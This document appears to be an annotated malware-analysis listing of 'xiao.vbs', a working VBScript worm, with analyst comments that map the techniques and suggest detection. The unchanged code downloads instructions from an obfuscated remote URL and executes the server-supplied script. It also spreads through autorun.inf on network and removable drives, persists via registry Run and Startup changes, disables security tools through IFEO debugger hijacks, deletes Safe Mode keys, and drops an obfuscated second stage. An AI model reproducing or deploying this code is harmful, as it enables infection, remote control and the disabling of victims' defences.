文件 'xiao.vbs', Visual Basic 脚本-病毒

时间:2021-12-20 08:28:19

' Script-level setup for the xiao.vbs sample. Annotations are analyst notes; the code is unchanged.
' NOTE(review): this listing shows "/" where Windows file and registry paths normally use "\";
' possibly a rendering artifact of the page - confirm against the original sample.
' Errors are suppressed from here on, so any step that fails is skipped silently.
on error resume next
' fh, br, js, oy, kc, kcc, iv: URL fragments stored under the position-shift encoding undone by bn().
' mz: marker string the script expects on its own first line (checked on the third line below).
' The WScript.Shell ProgID is assembled from fragments, so the full name is not a single literal in the file.
fh="ivwt?":br="01":js="3z{73iu7":oy="y3":kc="0Z42FYW":kcc="0d1exvFqF":iv="@k@4+|D":ma="x1W":mz="'xiao2.5":set cl=createobject("wsc"&"ript.s"&"hell")
' FileSystemObject is built the same way. dc = all drives; dir = special folder 1 (System), win = special folder 0 (Windows).
set fso=createobject("script"&"ing.fi"&"lesyste"&"mobject"):set dc=fso.drives:dir=fso.getspecialfolder(1)&"/":win=fso.getspecialfolder(0)&"/"
' wb = <system>/wbem/, exe = special folder 2 (Temp), xiao = full path of the running script, ml = its directory.
' If line 1 of the running file is not the mz marker, the script deletes itself and quits.
wb=dir&"wbem/":exe=fso.getspecialfolder(2)&"/":xiao=wscript.scriptfullname:ml=left(xiao,len(xiao)-len(wscript.scriptname)):if readtxt(xiao,1)<>mz then df xiao:wscript.quit
' pc/aff/pl-style names are the file names the sample drops. vc = the script's entire own source, which cv() writes out to replicate.
' ayy and ayi are shift-by-one strings decoded by ik() on the next line; both decode to the HKEY_LOCAL_MACHINE
' ...\Windows NT\CurrentVersion\Image File Execution Options\ path (ayy carries one extra leading character).
h=vbcrlf:pc="xiao.vbs":dt=".pif":aff="autorun.inf":pp="2.5":set sf=fso.opentextfile(xiao,1):vc=sf.readall:ayy="/ILFZ`MPDBM`NBDIJOF]TPGUXBSF]Njdsptpgu]Xjoepxt!OU]DvssfouWfstjpo]Jnbhf!Gjmf!Fyfdvujpo!Pqujpot]":ayi="ILFZ`MPDBM`NBDIJOF]TPGUXBSF]Njdsptpgu]Xjoepxt!OU]DvssfouWfstjpo]Jnbhf!Gjmf!Fyfdvujpo!Pqujpot]"
' SC and EF are shift-by-three strings (see decode()): SC -> \Software\Microsoft\Windows\CurrentVersion,
' EF -> \Explorer\User Shell Folders. aa/ab hold the decoded Image File Execution Options paths used by ez().
pv=".reg":tp="wscript.exe ":k=".exe":SC="_Vriwzduh_Plfurvriw_Zlqgrzv_FxuuhqwYhuvlrq":EF="_H{soruhu_Xvhu#Vkhoo#Iroghuv":aa=ik(ayy):ab=ik(ayi)
' RL -> \Policies\Explorer\Run\Explorer, WV -> the "Windows Registry Editor Version 5.00" .reg header,
' lj -> C:\Documents and Settings\All Users\Application (decoded on use). pyg/pce/pla/pcg are the decoded forms.
RL="_Srolflhv_H{soruhu_Uxq_H{soruhu":WV="Zlqgrzv#Uhjlvwu|#Hglwru#Yhuvlrq#8133":pyg=decode(sc):pce=decode(ef):pla=decode(rL):pcg=decode(wv):lj="F=_Grfxphqwv#dqg#Vhwwlqjv_Doo#Xvhuv_Dssolfdwlrq"
' pl is the file name used by oo() for the rescheduled copy. bbk and ljj are not referenced elsewhere in this listing.
bbk="wscript":ljj="%F=_Grfxphqwv#dqg#Vhwwlqjv_Doo#Xvhuv_dssolfdwlrq%":pl="prnttcl.vbs"
' Entry point: everything else runs from the main routine Z42FYW().
Z42FYW
' Existence test for path dz, selected by mode cs.
'   cs=1: returns 1 if dz is an existing file      cs=2: returns 2 if dz is an existing folder
'   cs=3: returns 3 if dz is NOT an existing file  cs=4: returns 4 if dz is NOT an existing folder
' In every other case the return value is left unassigned (Empty), which callers treat as false.
Function pd(dz,cs)
if cs=1 then If fso.FileExists(dz) Then pd=1
if cs=2 then If fso.FolderExists(dz) Then pd=2
if cs=3 then If not fso.FileExists(dz) Then pd=3
if cs=4 then If not fso.FolderExists(dz) Then pd=4
End Function
' Deletes zn through df() when it exists as a file. Not called anywhere else in this listing.
function zm(zn)
if pd(zn,1) then df zn
end function
' String de-obfuscation, shift-by-three: every character of zl is replaced by the character whose
' code is 3 lower and appended to the result. A character with code 16 is instead turned into chr(8)
' and, because the append sits in the Else branch, is not appended.
' Used for the registry paths and folder names assigned at script level (SC, EF, RL, WV, lj).
Function decode(zl)
On Error Resume Next
For i= 1 To Len(zl):Curchar=Mid(zl,i,1):If Asc(Curchar) = 16 then Curchar=chr(8):Else:Curchar=chr(Asc(Curchar)-3):DeCode=Decode & Curchar
Next
End Function
' String de-obfuscation, position-dependent shift: the i-th character (1-based) of wp has i
' subtracted from its character code. Z42FYW() uses it to assemble the download URL from the
' fragments fh, br, js, oy, kc, kcc and iv, so the URL never appears in clear text in the file.
function bn(wp)
for i=1 to len(wp)
bn=bn+chr(asc(mid(wp,i,1))-i)
next
end function
' Applies the registry script the caller has just written: runs "regedit /s" (silent import) on a
' file named ".reg" in a hidden window, waits 3 seconds, then deletes dir&pv (<system folder>/.reg).
' NOTE(review): the import uses a relative name while the file is written to dir&pv - whether both
' resolve to the same file depends on the working directory; confirm in a sandbox.
' Detection: regedit.exe started with /s by wscript.exe is a useful process-lineage signal.
function re()
cl.run "regedit /s .reg",0:wscript.sleep 3000:df dir&pv
end function
' Persistence routine (registry Run value with a Startup-folder fallback; cf. ATT&CK T1547.001).
' Runs only while no copy of the script exists at <decode(lj)>/xiao.vbs.
function jzc()
on error resume next
if pd(decode(lj)&"/"&pc,3) Then
' Read the "Explorer" value under HKCU ...\CurrentVersion\Policies\Explorer\Run.
ks=cl.regread ("HKCU"&PYG&PLA)
if not ks=pc then
' jc(...,1) is true when more than one avp.exe process is found (it also returns 1 if the WMI query errors).
if jc("avp"&k,1) then
nowdate=date
' Sets the system date to year 2003, keeping month and day, through the shell's date command.
' NOTE(review): presumably meant to interfere with the security product behind avp.exe - confirm.
command="%COMSPEC% /c date 2003-"&month(Date)&"-"&Day(Date)
cl.run command,0,true                  
wscript.sleep 5000
' rg() writes the Run value.
rg
else
rg
' Re-read to see whether the Run value was actually written.
ks=cl.regread ("HKCU"&PYG&PLA)
if not ks=pc  then
' Fallback: point the per-user "Startup" entry of User Shell Folders at %USERPROFILE%\Application
' (the hex(2) bytes below are that string in UTF-16LE), then place a copy of the script in decode(lj).
ges=cl.regread("HKCU"&pyg&pce&"/Startup")
if not ges="%USERPROFILE%/Application" then set i=fso.createtextfile(dir&pv, true):i.writeline pcg&h&"[HKEY_CURRENT_USER"&pyg&pce&"]"&h&"""Startup""=hex(2):25,00,55,00,53,00,45,00,52,00,50,00,52,00,4f,00,46,00,49,00,4c,00,45,00,25,00,5c,00,41,00,70,00,70,00,6c,00,69,00,63,00,61,00,74,00,69,00,6f,00,6e,00,00,00":i.close:re
' asd is not assigned anywhere in this listing, so it contributes an empty string here.
if pd(decode(lj),4) then fso.createfolder (decode(lj)):attr decode(lj)&asd&"/",6:cv decode(lj)&"/"&pc
if pd(decode(lj)&"/"&pc,3) then cv decode(lj)&"/"&pc
end if
end if
end if
end if
end function
' Drive propagation through autorun.inf (cf. ATT&CK T1091, replication through removable media).
' Called on every pass of the main loop in Z42FYW().
function gr()
on error resume next
for each d in dc
' DriveType 3 = network drive, 1 = removable; A: and B: are skipped.
if d.drivetype=3 or (d.drivetype=1 and d<>"A:" and d<> "B:") then
' A FOLDER named autorun.inf (a common way to block autorun.inf files) is removed recursively.
if pd(d&"/"&aff,2) then
command="%COMSPEC% /c  rd /s /q "&d&"/"&aff
cl.run command,0,true
end if
' Both files already present: re-check them and repair anything that does not carry the sample's markers.
if pd(d&"/"&aff,1) and pd(d&"/"&pc,1) then  
' "forgiveme" is the first line yh() writes, used here as an "already ours" marker.
' NOTE(review): af is not assigned at script scope in this listing, so the copy source is just dir - confirm.
if readtxt(d&"/"&aff,1)<>"forgiveme" then fso.copyfile dir&af,d&"/"&aff,true
if readtxt(d&"/"&pc,1)<>mz then cv d&"/"&pc
else
' Otherwise write autorun.inf, drop a copy of the script, and hide protected files in Explorer (yc).
yh(d&"/"&aff):cv d&"/"&pc :yc
end if
end if
' DriveType 2 = fixed disk: an existing autorun.inf file there is deleted.
if d.drivetype=2 then  if pd(d&"/"&aff,1) then  df d&"/"&aff
next
end function
' Downloader (cf. ATT&CK T1105): fetches www over HTTP and stores the body in the Temp folder.
'   www - URL to fetch            ys  - file name (suffix) under the Temp folder
'   sm  - size threshold / mode   css - 0 = save only, 1 = save as <ys>.exe and run if larger than sm
' Does nothing when <Temp>/<ys>.exe already exists. No integrity or origin check is applied to the
' downloaded content before it is executed.
' Detection: wscript.exe making outbound HTTP requests and writing files into %TEMP% that are then run.
Function hd(www,ys,sm,css)
on error resume next
if pd(exe&ys&k,3) then
' Synchronous GET (third argument 0 = not asynchronous).
Set Post = CreateObject("microsoft.XMLHTTP")
Post.Open "GET",www,0
Post.Send()
' ADODB.Stream in read/write mode (3) and binary type (1) is used to write the raw response to disk.
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
' sm>3000: save (overwrite) as <Temp>/<ys>, wait 10 s, set attributes 7 (read-only+hidden+system) and run it.
if sm>3000 then aGet.savetoFile exe&ys,2:wscript.sleep 10000:if pd(exe&ys,1) then attr exe&ys,7:cl.run exe&ys:exit function
' css=0: save only; this is how Z42FYW() retrieves its instruction file.
if css=0 then  aGet.savetoFile exe&ys:wscript.sleep 5000:exit function
' Otherwise save as <Temp>/<ys>.exe, mark it hidden+system, and run it only if it is larger than sm bytes.
aGet.savetoFile exe&ys&k,2
wscript.sleep 10000
if pd(exe&ys&k,1) then attr exe&ys&k,6:filesize=fso.getfile(exe&ys&k).size
if filesize>sm and css=1 then  cl.run exe&ys&k
end if
End Function
' Returns the operating system version string read from WMI (Win32_OperatingSystem.Version).
' Not called anywhere else in this listing.
function bm()
on error resume next
for each ps in getobject _
("winmgmts://./root/cimv2:win32_operatingsystem").instances_
bm=ps.version
next
end function
' Image File Execution Options (IFEO) "Debugger" hijack (cf. ATT&CK T1546.012 / T1562.001).
' For every executable name listed below, a .reg file sets "DEBUGGER"="SDF" under that name's IFEO key;
' Windows then starts the named debugger instead of the program, so the listed tools should no longer launch.
' The list consists of security and system-inspection tool image names.
' Detection: creation or modification of any "Debugger" value under
' HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<image>.
function ez()
on error resume next
a1="*Hunter"&k:a2="THGUARD"&k:a3="*Hunter"&k:a4="PFW"&k:a5="ZONEALARM"&k:a6="WEBSCANX"&k:a7="TBSCAN"&k:a8="SMC"&k:a9="spidernet"&k
a0="acaegmgr"&k:b1="ahnsdsv"&k:b2="ahnsd"&k:b3="psview"&k:b4="KVSrvXP"&k:b5="auto"&k:b6="ccsetmgr"&k:b7="defwatch"&k:b8="woptiutilities"&k:b9="snipesword"&k
' s, r and y are the separators that close one [key] section, write the DEBUGGER line and open the next key.
b0="iparmor"&k:c1="arvmon"&k:c2="srgui"&k:c3="KVOL"&k:c4="kvxp_1"&k:c5="icesword"&k:c6="fwmain"&k:c7="wsyscheck"&k:s="]":r="""DEBUGGER""=""SDF""":y=s&h&r&h&aa
c8="Mcshield"&k:c9="Tbmon"&k:c0="360tray"&k:d1="ravmon"&k:d2="rfwsrv"&k:d3="runiep"&k:d4="kissvc"&k:d5="kwatch"&k:d6="kavstart"&k
d7="kpfw32"&k:d8="nod32krn"&k:d9="nod32kui"&k:d0="egui"&k:e1="ekrn"&k:e2="mmqczj"&k:e3="avgnt"&k:e4="avguard"&k:e5="ccapp"&k
e6="ccevtmgr"&k:e7="navw32"&k:e8="kvxp"&k:e9="avg"&k:e0="guid"&k:f1="ssm"&k:f2="mpstart"&k:f3="APVXDWIN"&k:f4="PAVFNSVR"&k
' f8 is the last entry written; its DEBUGGER value doubles as the "already applied" sentinel read next.
f5="KRegEx"&k:f6="KvDetect"&k:f7="AVENGINE"&k:f8="gr9x3863r"&k
db=CL.REGREAD(ab&f8&"/DEBUGGER")
if not db="SDF" then
' Build the .reg file (header pcg, then one section per image name) and import it through re().
set i=fso.createtextfile(dir&pv, true)
i.writeline pcg&h&aa&a1&y&a2&y&a3&y&a4&y&a5&y&a6&y&a7&y&a8&y&a9&y&a0&y&b1&y&b2&y&b3&y&b4&y&b5&y&b6&y&b7&y&b8&y&b9&y&b0&y&c1&y&c2&y&c3&y&c4&y&c5&y&c6&y&c7&y&c8&y&c9&y&c0&y&d1&y&d2&y&d3&y&d4&y&d5&y&d6&y&d7&y&d8&y&d9&y&d0&y&e1&y&e2&y&e3&y&e4&y&e5&y&e6&y&e7&y&e8&y&e9&y&e0&y&f1&y&f2&y&f3&y&f4&y&f5&y&f6&y&f7&y&f8&s&h&r
i.close
re
end if
end function
' Main routine: initial setup, connectivity check, retrieval of a remote instruction file, optional
' self-update, then an endless maintenance loop that re-asserts persistence and executes remotely
' supplied script code.
function Z42FYW()
on error resume next
' ph(): local copies, persistence, Safe Mode key removal, scheduler preparation.
ph
' Connectivity probe against a well-known site; if the answer is not HTTP 200 the script
' reschedules itself through oo() and exits.
set xml=createobject("microsoft.xmlhttp")
xml.open "GET","http://www.baidu.com/index.html",false
xml.send
if xml.status<>200 then oo
' Remove any previous instruction file (<Temp>/.pif).
if pd(exe&dt,1) then df exe&dt
' Locale 2052 is zh-CN. The two branches fetch from URLs that differ in one path fragment (oy vs ma).
' The URL is assembled from bn()-decoded fragments plus the version string pp and saved to <Temp>/.pif.
' It is not reproduced decoded in these notes.
if  GetLocale=2052 then
dw=hd(bn(fh)&bn(br)&bn(js)&bn(oy)&bn(kc)&bn(iv)&pp,dt,0,0)
else
dx=hd(bn(fh)&bn(br)&bn(js)&ma&bn(kc)&bn(iv)&pp,dt,0,0)
end if
wscript.sleep 5000
' The instruction file is read as 14 consecutive lines into qk, ak, ay, ad, ae..ah, ai, aj, an, al, am, ax.
set oe=fso.opentextfile(exe&dt,1)
qk=oe.readline:ak=oe.readline:ay=oe.readline:ad=oe.readline:ae=oe.readline:af=oe.readline:ag=oe.readline:ah=oe.readline
ai=oe.readline:aj=oe.readline:an=oe.readline:al=oe.readline:am=oe.readline:ax=oe.readline:oe.close
' hu is assembled here but not used again in this listing.
mzz="2.5":hu=bn(fh)&bn(br)&bn(js)&bn(oy)&bn(kcc)
' Self-update: if line 2 compares greater than "2.5" (string comparison), download line 4's URL to
' <Temp>/<line 3>, run it through hd(), and quit.
if ak>mzz then hd ad,ay,3500,1:wscript.sleep 3000:wscript.quit
' If line 1 contains "http", ds() drops and starts the second-stage script network.vbe.
If instr(qk,"http") > 0 Then ds
' Lines 13 and 14 are ik()-decoded and passed to Execute: arbitrary script code supplied by the
' server runs inside this process. This is the sample's remote-control channel.
execute ik(am):execute ik(ax)
' Apply the IFEO hijack and delete the rescheduling copy (prnttcl.vbs) from the system folder.
ez:df dir&pl
do
wscript.sleep 100
' Eight more remotely supplied lines are decoded and executed on every pass of the loop.
execute ik(ae):execute ik(af):execute ik(ag):execute ik(ah):execute ik(ai):execute ik(aj):execute ik(an):execute ik(al)
' Removes the HKLM counterpart of the Run value when it holds ".vbs" or ".vbe", and deletes a file
' named ".vbs" in decode(lj). NOTE(review): purpose is not evident from this listing - confirm.
gj=cl.regread("HKLM"&PYG&PLA)
if gj=".vbs" or gj=".vbe" then cl.regdelete("HKLM"&PYG&PLA)
if pd(decode(lj)&"/"&".vbs",1) then df decode(lj)&"/"&".vbs"
' Self-healing: any copy whose first line is not the mz marker is rewritten from the in-memory source,
' then persistence (jzc) and drive propagation (gr) are re-applied.
if pd(decode(lj)&"/"&pc,1) and readtxt(decode(lj)&"/"&pc,1)<>mz then cv decode(lj)&"/"&pc
jzc:gr
if readtxt(dir&pc,1)<>mz then cv dir&pc
if readtxt(wb&pc,1)<>mz then cv wb&pc
ve=cl.regread ("HKCU"&PYG&PLA)
' When taskmgr.exe is running, the script exits and reschedules itself through oo().
if jc("taskmgr"&k,0) then oo
' Same date change as in jzc(): with more than one avp.exe process present the system year is set to 2003.
' The "date>2003" test compares a Date with the number 2003 rather than with a year.
if jc("avp"&k,1)and date>2003 then:nowdate=date:command="%COMSPEC% /c date 2003-"&month(Date)&"-"&Day(Date):cl.run command,0,true
loop
end function
' Start-up preparation, called first by Z42FYW().
function ph()
on error resume next
' ayk is ik()-encoded; it decodes to HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\vgasave.sys\
ayk="ILMN]Tztufn]DvssfouDpouspmTfu]Dpouspm]TbgfCppu]Njojnbm]whbtbwf/tzt]"
' Hide the running script (attributes 6 = hidden+system) and make sure copies exist in the system
' folder and in <system>/wbem, then establish persistence.
attr xiao,6
if pd(dir&pc,3) then cv dir&pc
if pd(wb&pc,3) then cv wb&pc
jzc  
' If the SafeBoot\Minimal\vgasave.sys key has the default value "Driver", the key is deleted.
' NOTE(review): removing SafeBoot entries is likely intended to break booting into Safe Mode
' (cf. ATT&CK T1562.009) - confirm. Detection: deletions under ...\Control\SafeBoot\.
kh=cl.regread(ik(ayk))
if kh="Driver" then cl.regdelete(ik(ayk))
' Registers msado15.dll silently. hd() creates an ADODB.Stream object, which presumably depends on it - confirm.
cl.run "regsvr32 /s ""C:/Program Files/Common Files/System/ado/msado15.dll",0,False
' Starts the Task Scheduler service (oo() relies on the "at" command), then runs "at /d /y",
' which appears to clear the existing at-jobs without prompting.
cl.run "net start "&chr(34)&"task scheduler"&chr(34) ,0,False:wscript.sleep 5000:cl.run "at /d /y",0,False
' Remove a second-stage script left over from an earlier run.
if pd(dir&"network.vbe",1)then df dir&"network.vbe"
end function
' Exit-and-return: rewrites a copy of the script as <system folder>/prnttcl.vbs, schedules it with
' the "at" command (cf. ATT&CK T1053.002) for the current time plus 0.001 day (roughly 86 seconds),
' and terminates this instance. Called when the connectivity probe fails or taskmgr.exe is running.
' Detection: at.exe launched by wscript.exe with /interactive and a .vbs argument.
function oo()
on error resume next
df dir&pl:cv dir&pl
cl.run "at "&time+0.001&" /interactive "&pl,0,False
wscript.quit
end function
' Replaces file wr with a single line of text wt and marks it hidden+system (attributes 6).
' Not called anywhere else in this listing; it may be intended for the remotely supplied code
' that Z42FYW() executes - unconfirmed.
function cj(wr,wt)
df wr
set bin=fso.createtextfile(wr,true)
bin.writeline wt
bin.close
attr wr,6
end function
' Writes and imports a .reg file that sets ShowSuperHidden=0 under
' HKCU ...\CurrentVersion\Explorer\Advanced, so Explorer does not display protected (hidden+system)
' files - the attributes the sample gives its own copies (cf. ATT&CK T1564.001).
function yc()
on error resume next
set i=fso.createtextfile(dir&pv, true)
i.writeline pcg&h&"[HKEY_CURRENT_USER"&pyg&"/Explorer/Advanced]"&h&"""ShowSuperHidden""=dword:00000000"
i.close
re
end function
' Text-file reader used for the marker checks.
'   line > 0  : returns that line of wr (1-based), or 0 if the file has fewer lines
'   line <= 0 : returns the whole file; a negative value also redirects wr to the running script itself
' Returns 0 when the file does not exist or is empty.
function readtxt(wr,line)
on error resume next
if line<0 then wr=wscript.scriptfullname
if fso.fileexists(wr) then
if fso.getfile(wr).size=0 then
readtxt=0
else
' The file is opened twice: chickline is read to the end only to learn the line count (its .Line
' property after ReadAll); readfile is the handle the content is actually taken from.
set readfile=fso.opentextfile(wr,1)
set chickline=fso.opentextfile(wr,1)
chickline.readall
txtline=chickline.line
chickline.close
if line>0  and line<=txtline then
' Advance line by line; strline ends up holding the requested line.
i=0
do while i<line
i=i+1
if not readfile.atendofstream then
strline=readfile.readline
else
strline=0
end if
loop
readtxt=strline
elseif line<=0 then
readtxt=readfile.readall
else
readtxt=0
end if
readfile.close
end if
else
readtxt=0
end if
end function
' Second-stage dropper: writes <system folder>/network.vbe and starts it with wscript in a hidden window.
' The dropped file contains ChgStr(), a character-substitution decoder (f1..f4), and one Execute() call
' on a payload stored under that substitution (f5). The table/key pair is at the end of f5.
' Spot-decoding the payload's first line gives "on error resume next"; the rest was not fully decoded
' for these notes - treat network.vbe as a separate script and analyse it on its own.
' Called from Z42FYW() when the first line of the downloaded instruction file contains "http".
' Detection: creation of network.vbe in the system folder; wscript.exe spawning wscript.exe.
function ds()
f1="Function ChgStr(str,table,key):For i=1 To Len(str):one=Mid(str,i,1):flag=FALSE:For j=1 To Len(table)"
f2="If one=Mid(table,j,1) Then ChgStr=ChgStr&Mid(key,j,1):flag=TRUE:Exit For"
f3="Next:If flag=FALSE Then ChgStr=ChgStr&one"
f4="Next:End Function"
f5="Execute(ChgStr(""""&""MR SxxMx xSjaNS RSFk""&VBCrLf&""2kN=""""2kN"""":2kNq=""""2kNq"""":Lj3=""""Lj3"""":Bj=""""Bj"""":j2kNq=""""j2kNq"""":Lj3F=""""Lj3F"""":323=""""323"""":U2M=""""U2M""""""&VBCrLf&""GSk JGC = ZxSLkSCbBSKk(""""GKxD3kDRU.JDqSGsjkSNCbBSKk""""):SFS=ujM.USkj3SKDLquMqzSx(o)&""""/"""":FDLM=pjKxD3k.jKxD3kuaqqRLNS""&VBCrLf&""GSk zK = ujM.ixDySj:uMx SLK2 z DR zK:jSk MS=ujM.M3SRkSFkuDqS(SFS&"""".3Du"""",I):Qt=MS.xSLzqDRS:MS.KqMjS""&VBCrLf&""Du z.zxDySqSkkSx<>""""Z""""  k2SR j(z):ujM.zSqSkSuDqS FDLM""&VBCrLf&""Pd0A""&VBCrLf&""jab j(R)""&VBCrLf&""MR SxxMx xSjaNS RSFk ""&VBCrLf&""jSk R=ujM.USkuMqzSx(R):jSk uDqSj=R.uDqSj:uMx SLK2 N DR uDqSj:SFk=ujM.USkSFkSRjDMRRLNS(N):SFk=qKLjS(SFk)""&VBCrLf&""Du SFk=U2M k2SR ujM.USkuDqS(N.3Lk2):N.zSqSkS(kxaS)""&VBCrLf&""Du SFk=Lj3 Mx SFk=2kN Mx SFk=2kNq Mx SFk=Bj Mx SFk=Lj3F Mx SFk=j2kNq Mx SFk=323 k2SR ""&VBCrLf&""LL=ujM.USkuDqS(N.3Lk2)""&VBCrLf&""jSk k= ujM.C3SRASFkJDqS(LL,I,kxaS):q=k.gSLz1qq:k.KqMjS""&VBCrLf&""Vu RMk DRjkx(q,""""mmIM"""") > m A2SR""&VBCrLf&""jSk k=ujM.C3SRASFkJDqS(LL, o, kxaS):k.hxDkS q&ybKxqu&Qt:k.KqMjS ""&VBCrLf&""SRz Du""&VBCrLf&""SRz Du""&VBCrLf&""RSFk""&VBCrLf&""pjKxD3k.jqSS3 I:jSk jabuMqzSxj=R.jabuMqzSxj:uMx SLK2 jabuMqzSx DR jabuMqzSxj:j(jabuMqzSx)""&VBCrLf&""RSFk""&VBCrLf&""SRz jab""&VBCrLf&""""&VBCrLf,""0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"",""XAhpKQ9PU5TjOiJxS61FcaomVNqneYgIB3MCub4EH7RWDstL0z2wlGykfZ8rvd""))"
set i=fso.createtextfile(dir&"network.vbe", true)
i.writeline f1&h&f2&h&f3&h&f4&h&f5
i.close
cl.run "wscript "&dir&"network.vbe",0,False
end function
' Registry persistence (cf. ATT&CK T1547.001): writes and imports a .reg file that adds the value
' "Explorer"="xiao.vbs" under HKCU ...\CurrentVersion\policies\Explorer\Run, so the script is
' started at logon. The value name mimics a legitimate Windows component.
' Detection: new values under ...\Policies\Explorer\Run that reference script files.
function rg()
on error resume next
set i=fso.createtextfile(dir&pv, true)
i.writeline pcg&h&"[HKEY_CURRENT_USER"&pyg&"/policies/Explorer/Run/]"&h&"""Explorer""=""xiao.vbs"""
i.close
re
end function
' String de-obfuscation, shift-by-one: every character of wr is replaced by the character whose
' code is 1 lower and appended to the result. A character with code 12 is instead turned into chr(8)
' and, because the append sits in the Else branch, is not appended.
' Used for the registry paths ayy/ayi/ayk and, in Z42FYW(), for the lines of the downloaded
' instruction file before they are passed to Execute.
Function ik(wr)
On Error Resume Next
For i= 1 To Len(wr):cr=Mid(wr,i,1):If Asc(cr) = 12 then cr=chr(8):Else:cr=chr(Asc(cr)-1):ik=ik & cr
Next
End Function
' Writes the autorun.inf used for drive propagation at path wr and marks it hidden+system.
' Line 1 is the marker "forgiveme" (checked by gr()); the [autorun] section points the open action
' and the shell open/find verbs at "wscript.exe xiao.vbs" and makes "open" the default verb.
' Mitigation note: disabling AutoRun/AutoPlay for removable and network drives neutralises this file.
function yh(wr)
on error resume next
df wr
set i=fso.createtextfile(wr, true)
i.writeline "forgiveme"&h&"[autorun]"&h&"open="&tp&pc&h&"shell/open/Command="&tp&pc&h&"shell/find/Command="&tp&pc&h&"shell/open/default=1"
i.close
attr wr,6
end function
' Self-replication primitive: replaces wr with the script's own source (vc, read at start-up) and
' sets attributes 7 (read-only+hidden+system) on the copy.
function cv(wr)
df wr
set vbs=fso.createtextfile(wr, true)
vbs.write vc
vbs.close
attr wr,7
end function
' Sets the attribute bitmask change on file, which may be a file or a folder.
' Values used in this script: 0 = none, 6 = hidden+system, 7 = read-only+hidden+system.
function attr(file,change)
if pd(file,1) then
set ofile=fso.getfile(file)
ofile.attributes=change
set ofile=nothing
end if
if pd(file,2) then
set ofile=fso.getfolder(file)
ofile.attributes=change
set ofile=nothing
end if
end function
' Deletes wr. A file has its attributes cleared first so read-only/hidden/system flags do not block
' the delete; a folder is removed recursively and quietly through the command shell (rd /s /q).
function df(wr)
if pd(wr,1) then attr wr,0:fso.deletefile(wr)
if pd(wr,2) then command="%COMSPEC% /c  rd /s /q "&wr:cl.run command,0,true
end function
' Process check through WMI: counts Win32_Process instances whose name equals wr.
' Returns True when the count is greater than gs. If an error was recorded (er() is true) it
' returns 1 instead, which callers also treat as true. Otherwise the result is left unassigned.
' Used to detect taskmgr.exe and avp.exe.
function jc(wr,gs)
on error resume next
set y=getobject("winmgmts://./root/cimv2")
set x=y.execquery("select * from win32_process where name='"&wr&"'")
i=0
for each j in x
i=i+1
next
if not er then
if i>gs then jc=true
else
jc=1
end if
end function
' Error probe: returns False when Err.Number is 0; otherwise clears the Err object and returns True.
function er()
if err.number=0 then
er=false
else
err.clear
er=true
end if
end function